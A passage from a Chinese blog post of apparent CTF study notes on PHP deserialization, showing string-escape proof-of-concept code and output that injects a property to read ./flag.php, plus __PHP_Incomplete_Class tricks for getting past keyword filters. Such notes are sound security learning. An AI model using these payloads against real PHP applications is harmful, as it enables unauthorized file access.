<span class="token comment">//配合我们需要溢出的字符串一起填入name中即可</span>
<span class="token comment">//NSSNSSNSSNSSNSSNSSNSSNSSNSSNSSNSSNSSNSSNSSNSSNSSNSShellohello";s:5:"phone";s:1:"a";s:5:"email";s:10:"./flag.php";&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>最终poc</p>
<pre class="line-numbers language-json" data-language="json"><code class="language-json">function abscond($string) <span class="token punctuation">&#123;</span>
    $filter = array('NSS'<span class="token punctuation">,</span> 'CTF'<span class="token punctuation">,</span> 'OTL_QAQ'<span class="token punctuation">,</span> 'hello');
    $filter = '/' . implode('|'<span class="token punctuation">,</span> $filter) . '/i';
    return preg_replace($filter<span class="token punctuation">,</span> 'hacker'<span class="token punctuation">,</span> $string);
<span class="token punctuation">&#125;</span>

class escape<span class="token punctuation">&#123;</span>

    public $name;
    public $phone;
    public $email;
    public function __construct($name<span class="token punctuation">,</span>$phone<span class="token punctuation">,</span>$email)
    <span class="token punctuation">&#123;</span>
        $this->name=$name;
        $this->phone=$phone;
        $this->email=$email;
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>
$name='NSSNSSNSSNSSNSSNSSNSSNSSNSSNSSNSSNSSNSSNSSNSSNSSNSShellohello<span class="token string">";s:5:"</span>phone<span class="token string">";s:1:"</span>a<span class="token string">";s:5:"</span>email<span class="token string">";s:10:"</span>./flag.php";<span class="token punctuation">&#125;</span>';
$phone=<span class="token string">"111"</span>;
$email=<span class="token string">"111"</span>;
$a=new escape($name<span class="token punctuation">,</span>$phone<span class="token punctuation">,</span>$email);

$ser=serialize($a);
var_dump(unserialize(abscond($ser)));



class escape#<span class="token number">2</span> (<span class="token number">3</span>) <span class="token punctuation">&#123;</span>
  public $name =>
  string(<span class="token number">114</span>) <span class="token string">"hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker"</span>
  public $phone =>
  string(<span class="token number">1</span>) <span class="token string">"a"</span>
  public $email =>
  string(<span class="token number">10</span>) <span class="token string">"./flag.php"</span>
<span class="token punctuation">&#125;</span> <span class="token comment">//逃逸成功</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>


<h4 id="收缩做法"><a href="#收缩做法" class="headerlink" title="收缩做法"></a>收缩做法</h4><p>收缩的话，那就要吧他正常序列化的字符串全部吞入，作为name的属性</p>
<pre class="line-numbers language-json" data-language="json"><code class="language-json">
class escape<span class="token punctuation">&#123;</span>

    public $name=<span class="token string">"name"</span>;
    public $phone='phone';
    public $email=<span class="token string">"./flag"</span>;
<span class="token punctuation">&#125;</span>

$a=new escape();
echo serialize($a);

<span class="token comment">//O:6:"escape":3:&#123;s:4:"name";s:4:"name";s:5:"phone";s:5:"phone";s:5:"email";s:6:"./flag";&#125;</span>

<span class="token comment">//phone的值为 ;s:5:"phone";s:5:"phone";s:5:"email";s:6:"./flag";&#125;</span>
<span class="token comment">//需要收缩到";s:5:"phone";s:5:"    </span>
<span class="token comment">//19个字符，需要19个OTL_QAQ</span>
<span class="token comment">//OTL_QAQOTL_QAQOTL_QAQOTL_QAQOTL_QAQOTL_QAQOTL_QAQOTL_QAQOTL_QAQOTL_QAQOTL_QAQOTL_QAQOTL_QAQOTL_QAQOTL_QAQOTL_QAQOTL_QAQOTL_QAQOTL_QAQ</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>poc</p>
<pre class="line-numbers language-json" data-language="json"><code class="language-json">&lt;?php

function abscond($string) <span class="token punctuation">&#123;</span>
    $filter = array('NSS'<span class="token punctuation">,</span> 'CTF'<span class="token punctuation">,</span> 'OTL_QAQ'<span class="token punctuation">,</span> 'hello');
    $filter = '/' . implode('|'<span class="token punctuation">,</span> $filter) . '/i';
    return preg_replace($filter<span class="token punctuation">,</span> 'hacker'<span class="token punctuation">,</span> $string);
<span class="token punctuation">&#125;</span>
class escape<span class="token punctuation">&#123;</span>

    public $name;
    public $phone;
    public $email;
    public function __construct($name<span class="token punctuation">,</span>$phone<span class="token punctuation">,</span>$email)
    <span class="token punctuation">&#123;</span>
        $this->name=$name;
        $this->phone=$phone;
        $this->email=$email;
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>
$name=<span class="token string">"OTL_QAQOTL_QAQOTL_QAQOTL_QAQOTL_QAQOTL_QAQOTL_QAQOTL_QAQOTL_QAQOTL_QAQOTL_QAQOTL_QAQOTL_QAQOTL_QAQOTL_QAQOTL_QAQOTL_QAQOTL_QAQOTL_QAQ"</span>;
$phone=';s<span class="token operator">:</span><span class="token number">5</span><span class="token operator">:</span><span class="token string">"phone"</span>;s<span class="token operator">:</span><span class="token number">5</span><span class="token operator">:</span><span class="token string">"phone"</span>;s<span class="token operator">:</span><span class="token number">5</span><span class="token operator">:</span><span class="token string">"email"</span>;s<span class="token operator">:</span><span class="token number">6</span><span class="token operator">:</span><span class="token string">"./flag"</span>;<span class="token punctuation">&#125;</span>';
$email=<span class="token string">"email"</span>;

$a=new escape($name<span class="token punctuation">,</span>$phone<span class="token punctuation">,</span>$email);
$ser=serialize($a);

var_dump(unserialize(abscond($ser)));


class escape#<span class="token number">2</span> (<span class="token number">3</span>) <span class="token punctuation">&#123;</span>
  public $name =>
  string(<span class="token number">133</span>) <span class="token string">"hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker"</span>;s<span class="token operator">:</span><span class="token number">5</span><span class="token operator">:</span><span class="token string">"phone"</span>;s<span class="token operator">:</span><span class="token number">51</span><span class="token operator">:</span>"
  public $phone =>
  string(<span class="token number">5</span>) <span class="token string">"phone"</span>
  public $email =>
  string(<span class="token number">6</span>) <span class="token string">"./flag"</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>字符串逃逸的具体把握只能看对于序列化字符串的了解，具体也没啥好说的</p>
<h3 id="trick"><a href="#trick" class="headerlink" title="trick"></a>trick</h3><p><a target="_blank" rel="noopener" href="https://hackerqwq.github.io/2021/08/29/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%B0%8F%E6%8A%80%E5%B7%A7%E4%B9%8BFast-Destruct/#stdClass%E5%92%8C-PHP-Incomplete-Class">https://hackerqwq.github.io/2021/08/29/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%B0%8F%E6%8A%80%E5%B7%A7%E4%B9%8BFast-Destruct/#stdClass%E5%92%8C-PHP-Incomplete-Class</a><br>内置类使用<br>如果题目当中没有能够反序列化获取属性的对象，那么可以用stdClass类，这是一个php的内置类</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token variable">$a</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">stdClass</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$a</span><span class="token operator">-></span><span class="token property">neutron</span><span class="token operator">=</span><span class="token operator">&amp;</span><span class="token variable">$a</span><span class="token operator">-></span><span class="token property">nova</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token function">serialize</span><span class="token punctuation">(</span><span class="token variable">$a</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>如果有那种serialize(unserialize($poc))那种检测关键词的，可以看看下面这个trick<br>反序列化的时候找不到Test类，因此会将这些类都归到__PHP_Incomplete_Class类中<br>$__PHP_Incomplete_Class_Name变量对应要反序列化的类名</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token function">var_dump</span><span class="token punctuation">(</span><span class="token function">unserialize</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'a:2:&#123;i:0;O:8:"stdClass":1:&#123;s:3:"abc";N;&#125;i:1;O:4:"Test":1:&#123;s:3:"abc";N;&#125;&#125;'</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>


<span class="token keyword">array</span><span class="token punctuation">(</span><span class="token number">2</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
  <span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span> <span class="token operator">=></span>
  <span class="token keyword">class</span> <span class="token class-name-definition class-name">stdClass</span><span class="token comment">#1 (1) &#123;</span>
    <span class="token keyword">public</span> <span class="token variable">$abc</span> <span class="token operator">=></span>
    <span class="token constant">NULL</span>
  <span class="token punctuation">&#125;</span>
  <span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span> <span class="token operator">=></span>
  <span class="token keyword">class</span> <span class="token class-name-definition class-name">__PHP_Incomplete_Class</span><span class="token comment">#2 (2) &#123;</span>
    <span class="token keyword">public</span> <span class="token variable">$__PHP_Incomplete_Class_Name</span> <span class="token operator">=></span>
    <span class="token keyword type-declaration">string</span><span class="token punctuation">(</span><span class="token number">4</span><span class="token punctuation">)</span> <span class="token string double-quoted-string">"Test"</span>
    <span class="token keyword">public</span> <span class="token variable">$abc</span> <span class="token operator">=></span>
    <span class="token constant">NULL</span>
  <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>如果不指定__PHP_Incomplete_Class_Name的话，那么__PHP_Incomplete_Class类下的变量在序列化再反序列化之后就会消失，从而绕过某些关键字<br><img src="https://cdn.nlark.com/yuque/0/2023/png/35213294/1690885655254-948300d5-2bd2-4589-8ae7-106bb1d7af02.png#averageHue=%23171616&clientId=u4bae68d0-c03b-4&from=paste&height=221&id=u0d221ef9&originHeight=332&originWidth=1900&originalType=binary&ratio=1.5&rotation=0&showTitle=false&size=122738&status=done&style=none&taskId=u0b0d3456-ecd3-4ce6-a42d-ed3c44dc77c&title=&width=1266.6666666666667" alt="image.png"></p>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/2023/06/28/fastjson%E6%BC%8F%E6%B4%9E%E8%A7%A3%E6%9E%90%E9%AB%98%E6%B8%85%E9%87%8D%E5%88%B6%E7%89%88/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>Prev</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime mr-10" title="Update time"></i>
              2023-08-24 21:12:22
            </span>
            
          </div>
          <div class="post-foot-prev">
            
              <a href="/2023/08/25/%E6%8A%A4%E7%BD%91%E6%97%A5%E8%AE%B0/" target="_self">
                <span>Next</span>
                <i class="iconfont icon-chevronright"></i>
              </a>
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">Contents</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BB%8B%E7%BB%8D"><span class="toc-text">介绍</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95"><span class="toc-text">魔术方法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#bypass"><span class="toc-text">bypass</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#wakeupByass"><span class="toc-text">wakeupByass</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#PHP5-lt-5-6-25-%E6%88%96-PHP7-lt-7-0-10"><span class="toc-text">PHP5&lt;5.6.25 或 PHP7&lt;7.0.10</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#php7-3"><span class="toc-text">php7.3</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#fast-destruct-%E5%85%B7%E4%BD%93%E7%89%88%E6%9C%AC%E6%88%91%E4%B8%8D%E8%AE%B0%E5%BE%97%E4%BA%86"><span class="toc-text">fast destruct  具体版本我不记得了</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#php7-8"><span class="toc-text">php7-8</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%AD%97%E7%AC%A6%E5%85%B3%E9%94%AE%E8%AF%8D%E7%AD%89bypass"><span class="toc-text">字符关键词等bypass</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%BB%95%E8%BF%87GC%E5%9B%9E%E6%94%B6"><span class="toc-text">绕过GC回收</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%BB%95%E8%BF%87md5-sha1%E9%AA%8C%E8%AF%81"><span class="toc-text">绕过md5+sha1验证</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E9%80%83%E9%80%B8"><span class="toc-text">反序列化字符串逃逸</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%BA%A2%E5%87%BA%E5%81%9A%E6%B3%95"><span class="toc-text">溢出做法</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%94%B6%E7%BC%A9%E5%81%9A%E6%B3%95"><span class="toc-text">收缩做法</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#trick"><span class="toc-text">trick</span></a></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        




  
    <script async type="text/javascript" src='https://cdn.jsdelivr.net/npm/valine@1.4.18/dist/Valine.min.js' onload="loadValineSuc(this)"></script>
  

  <div id="vcomments"></div>

  <script>
    function loadValineSuc() {
      new Valine({
        el: '#vcomments',
        appId: 'bNa2jesvrDl0f51DIPiFWHCO-gzGzoHsz',
        appKey: 'UfLQ40Ou8xWfDtBEct4Yxct1',
        placeholder: 'welcome!',
        avatar: 'retro',
        lang: 'en'
      })
    }
  </script>

    <style>
      .comments-container .v .vempty {
        display: none!important;
      }
    </style>




      </div>
    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Copyright © 2025 Oranges</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="Search...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>First search, index file loading, please wait...<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>No result<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The search.xml file was not found, please refer to：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The request failed, Try to refresh the page or try again later.<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%B0%8F%E8%AE%B0(1) + '&url=' + http%3A%2F%2Fexample.com%2F2023%2F08%2F01%2Fphp%25E5%258F%258D%25E5%25BA%258F%25E5%2588%2597%25E5%258C%2596%25E5%25B0%258F%25E8%25AE%25B0-1%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=http://example.com/2023/08/01/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%B0%8F%E8%AE%B0-1/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
